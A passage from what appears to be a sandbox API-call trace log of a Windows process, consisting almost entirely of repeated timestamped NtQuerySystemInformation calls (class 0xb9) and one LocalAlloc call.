SystemInformation=0xa781ffda70, Length=0x28, ResultLength=0x0) [0234.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda70, Length=0x28, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9d0, Length=0x20, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9d0, Length=0x20, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x48, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x48, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.228] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x26949596870 [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x28, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x48, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x20, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbd0, Length=0x20, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc68, Length=0x28, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x20, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x20, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x20, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc50, Length=0x20, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc50, Length=0x20, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x28, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb40, Length=0x48, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaa0, Length=0x28, ResultLength=0x0) [0234.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaa0, Length=0x28, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb40, Length=0x48, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaa0, Length=0x28, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaa0, Length=0x28, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, 